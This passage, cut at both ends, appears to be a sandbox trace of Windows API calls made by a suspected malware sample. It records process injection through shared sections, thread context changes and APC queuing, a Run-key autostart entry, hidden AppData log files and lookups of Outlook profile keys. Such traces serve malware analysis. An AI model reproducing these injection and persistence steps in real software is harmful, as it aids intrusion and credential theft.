[301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, 
[482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0078.546] NtCreateSection (in: SectionHandle=0x24e4a0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x24e460, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x24e4a0*=0xa4) returned 0x0 [0078.546] NtMapViewOfSection (in: SectionHandle=0xa4, ProcessHandle=0xffffffff, BaseAddress=0x24e4a8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e460*=0x196a00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24e4a8*=0x24d0000, SectionOffset=0x0, ViewSize=0x24e460*=0x197000) returned 0x0 [0078.546] NtMapViewOfSection (in: SectionHandle=0xa4, ProcessHandle=0x9c, BaseAddress=0x24e4a4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e49c*=0x196a00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24e4a4*=0x63a0000, SectionOffset=0x0, ViewSize=0x24e49c*=0x197000) returned 0x0 [0078.569] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x24d0000) returned 0x0 [0078.584] NtClose (Handle=0xa4) returned 0x0 [0078.588] NtSetContextThread (ThreadHandle=0xa0, Context=0x24e4e0*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, 
[22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x266ec70, Ebx=0x0, Edx=0x1af1d8, Ecx=0xdd, Eax=0xe1cd86d3, Ebp=0x1afaac, Eip=0x64a4b87, SegCs=0x1b, EFlags=0x246, Esp=0x1afa90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, 
[116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, 
[297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, 
[478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0078.592] NtQueueApcThread (ThreadHandle=0xa0, ApcRoutine=0x64a4b8c, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0078.596] NtResumeThread (in: ThreadHandle=0xa0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0078.596] NtClose (Handle=0x9c) returned 0x0 [0078.596] NtClose (Handle=0xa0) returned 0x0 [0078.600] PostThreadMessageW (idThread=0x614, Msg=0x111, wParam=0x0, lParam=0x0) returned 1 [0078.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x1f0000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0078.762] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0083.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x1f0000, RegionSize=0x24e818*=0x10000) returned 0x0 [0083.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1f0000, ResultLength=0x0) returned 0x0 [0083.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x1f0000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0083.836] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0088.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x1f0000, RegionSize=0x24e818*=0x10000) returned 0x0 [0088.832] 
NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1f0000, ResultLength=0x0) returned 0x0 [0088.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x1f0000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0088.919] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0093.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x1f0000, RegionSize=0x24e818*=0x10000) returned 0x0 [0093.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1f0000, ResultLength=0x0) returned 0x0 [0093.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x1f0000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0093.957] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0098.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x1f0000, RegionSize=0x24e818*=0x10000) returned 0x0 [0098.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1f0000, ResultLength=0x0) returned 0x0 [0099.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x1f0000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0099.038] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0104.063] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x24e800 | out: TokenHandle=0x24e800*=0x5c) returned 0x0 [0104.063] NtQueryInformationToken (in: TokenHandle=0x5c, TokenInformationClass=0x14, 
TokenInformation=0x24e7f8, TokenInformationLength=0x4, ReturnLength=0x24e7fc | out: TokenInformation=0x24e7f8, ReturnLength=0x24e7fc) returned 0x0 [0104.063] NtClose (Handle=0x5c) returned 0x0 [0104.063] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0104.063] NtCreateFile (in: FileHandle=0x24e7f0, DesiredAccess=0x12019f, ObjectAttributes=0x24e7b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e7f0*=0xffffffff, IoStatusBlock=0x24e7d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0104.063] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7c0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0104.063] NtCreateFile (in: FileHandle=0x24e7e0, DesiredAccess=0x120089, ObjectAttributes=0x24e7a8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7c8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e7e0*=0xffffffff, IoStatusBlock=0x24e7c8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0104.063] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x24e3d0 | out: TokenHandle=0x24e3d0*=0x5c) returned 0x0 [0104.063] 
NtQueryInformationToken (in: TokenHandle=0x5c, TokenInformationClass=0x1, TokenInformation=0x24dbc8, TokenInformationLength=0x400, ReturnLength=0x24e3c8 | out: TokenInformation=0x24dbc8, ReturnLength=0x24e3c8) returned 0x0 [0104.063] ConvertSidToStringSidW () returned 0x1 [0104.063] NtClose (Handle=0x5c) returned 0x0 [0106.029] NtCreateKey (in: KeyHandle=0x24e808, DesiredAccess=0x2021f, ObjectAttributes=0x24e3cc*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e808*=0x5c) returned 0x0 [0106.697] NtSetValueKey (in: KeyHandle=0x5c, ValueName="VFIL_RNHERNX", TitleIndex=0x0, Type=0x1, Data="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", DataSize=0x4a | out: Data="C:\\Program Files\\Crfitq6x\\gdigzvh.exe") returned 0x0 [0106.698] NtClose (Handle=0x5c) returned 0x0 [0106.698] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7d4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.698] NtCreateFile (in: FileHandle=0x24e7f4, DesiredAccess=0x12019f, ObjectAttributes=0x24e7bc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7dc, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e7f4*=0xffffffff, IoStatusBlock=0x24e7dc*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0106.698] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7c4, NtFileNamePart=0x0, 
DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.698] NtCreateFile (in: FileHandle=0x24e7e4, DesiredAccess=0x120089, ObjectAttributes=0x24e7ac*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7cc, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e7e4*=0xffffffff, IoStatusBlock=0x24e7cc*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0106.698] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-", NtPathName=0x24e7e4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.698] NtCreateFile (in: FileHandle=0x24e804, DesiredAccess=0x100181, ObjectAttributes=0x24e7cc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7ec, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x21, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e804*=0x5c, IoStatusBlock=0x24e7ec*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0106.756] NtQueryInformationFile (in: FileHandle=0x5c, IoStatusBlock=0x24e7ec, FileInformation=0x24e78c, Length=0x28, FileInformationClass=0x4 | out: IoStatusBlock=0x24e7ec, FileInformation=0x24e78c) returned 0x0 [0106.760] NtSetInformationFile (FileHandle=0x5c, IoStatusBlock=0x24e7ec, FileInformation=0x24e78c, Length=0x28, FileInformationClass=0x4) returned 0x0 [0106.761] NtClose (Handle=0x5c) returned 0x0 [0106.761] RtlDosPathNameToNtPathName_U (in: 
DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlog.ini", NtPathName=0x24e7d4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlog.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.761] NtCreateFile (in: FileHandle=0x24e7f4, DesiredAccess=0x12019f, ObjectAttributes=0x24e7bc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlog.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7dc, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e7f4*=0x5c, IoStatusBlock=0x24e7dc*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0106.773] NtClose (Handle=0x5c) returned 0x0 [0106.773] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x24e16c | out: TokenHandle=0x24e16c*=0x5c) returned 0x0 [0106.773] NtQueryInformationToken (in: TokenHandle=0x5c, TokenInformationClass=0x1, TokenInformation=0x24d964, TokenInformationLength=0x400, ReturnLength=0x24e164 | out: TokenInformation=0x24d964, ReturnLength=0x24e164) returned 0x0 [0106.773] ConvertSidToStringSidW () returned 0x1 [0106.773] NtClose (Handle=0x5c) returned 0x0 [0106.773] NtCreateKey (in: KeyHandle=0x24e7e0, DesiredAccess=0x20219, ObjectAttributes=0x24e168*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e7e0*=0x0) returned 0xc0000034 [0106.773] NtCreateKey (in: KeyHandle=0x24e7e0, DesiredAccess=0x20219, ObjectAttributes=0x24e160*(Length=0x18, RootDirectory=0x0, 
ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e7e0*=0x5c) returned 0x0 [0106.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24e058, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.773] NtCreateFile (in: FileHandle=0x24e078, DesiredAccess=0x120089, ObjectAttributes=0x24e040*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, 